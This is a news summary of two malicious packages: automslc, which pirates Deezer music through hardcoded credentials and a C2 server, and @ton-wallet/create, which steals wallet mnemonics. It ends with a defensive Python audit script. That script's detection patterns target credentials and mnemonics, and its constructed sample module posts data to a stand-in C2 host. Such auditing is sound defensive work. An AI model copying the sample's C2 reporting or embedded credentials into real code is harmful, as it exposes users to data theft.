Malicious Python Package Hits a Sour Note: 104K Downloads and a Symphony of Cybersecurity Risks
Cybersecurity alarm bells are ringing over automslc, a malicious Python library that downloads music from Deezer without authorization. With over 104,000 downloads, it slips past Deezer’s restrictions using hardcoded credentials and a command-and-control server. Users unwittingly join a music piracy party and risk legal trouble along the way. Beware of PyPI’s music piracy trap!

Hot Take:
Looks like the PyPI repository is trying to become the Spotify of piracy! With this new discovery, our hacker friends have found yet another way to make sure that your playlists can be downloaded faster than you can say “DMCA takedown notice.” Meanwhile, the @ton-wallet/create package is living proof that even in the world of crypto, you should never trust a package that arrives with a mnemonic phrase and a wink. Here’s hoping you don’t end up making a song and dance about your missing digital assets!
Key Points:
- Malicious Python library automslc found on PyPI, facilitating unauthorized music downloads from Deezer.
- automslc uses hardcoded credentials and communicates with an external C2 server, bypassing Deezer’s API restrictions.
- The package has been downloaded over 104,000 times since May 2019.
- Another rogue package, @ton-wallet/create, was found stealing cryptocurrency wallet mnemonic phrases.
- Regular audits and scanning tools are recommended to reduce supply chain security risks.
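As an added example (not code from the post or from either package), here is a small heuristic audit that flags the three behaviours described above in an installed package's source: credential-looking string assignments, URLs to hosts outside an allowlist, and references to wallet mnemonics. The regex patterns, the `api.deezer.com` allowlist entry and the sample module are all constructed assumptions for illustration.

```python
"""Heuristic source audit for the behaviours this post describes.

Added example; patterns and sample input are constructed, not taken from
the real automslc or @ton-wallet/create packages.
"""
import re
from pathlib import Path

# Constructed pattern: a credential-like name assigned a long string literal.
CREDENTIAL_RE = re.compile(
    r'^\s*(?:self\.)?(?:password|passwd|secret|token|api_key|arl)\s*=\s*["\'][^"\']{6,}["\']',
    re.IGNORECASE | re.MULTILINE)
# Constructed pattern: code that touches wallet recovery phrases.
MNEMONIC_RE = re.compile(r'\b(?:mnemonic|seed_phrase|recovery_phrase)\b', re.IGNORECASE)
# Any http(s) URL literal; the captured group is the host.
URL_RE = re.compile(r'https?://([A-Za-z0-9.\-]+)')


def audit_source(text: str, allowed_hosts: set[str]) -> list[str]:
    """Return finding labels for one module's source text (empty list if clean)."""
    findings = []
    if CREDENTIAL_RE.search(text):
        findings.append("hardcoded-credential")
    for host in URL_RE.findall(text):
        if host not in allowed_hosts:
            findings.append(f"unexpected-host:{host}")
    if MNEMONIC_RE.search(text):
        findings.append("mnemonic-access")
    return findings


def audit_package(root: Path, allowed_hosts: set[str]) -> dict[str, list[str]]:
    """Walk a package directory (e.g. site-packages/<name>) and audit every .py file."""
    report = {}
    for path in sorted(root.rglob("*.py")):
        findings = audit_source(path.read_text(errors="replace"), allowed_hosts)
        if findings:
            report[str(path.relative_to(root))] = findings
    return report


# Constructed sample module mimicking the post's description: a hardcoded
# credential plus a report to an unexpected host next to a legitimate API call.
SAMPLE = '''
import requests
ARL = "0123456789abcdef0123456789abcdef"
def fetch(track_id):
    requests.post("http://c2.example.invalid/report", data={"id": track_id})
    return requests.get("https://api.deezer.com/track/%s" % track_id)
'''

if __name__ == "__main__":
    print(audit_source(SAMPLE, {"api.deezer.com"}))
```

Run it against a real package with `audit_package(Path(".../site-packages/<name>"), {...})`; findings are only leads for manual review, not proof of malice.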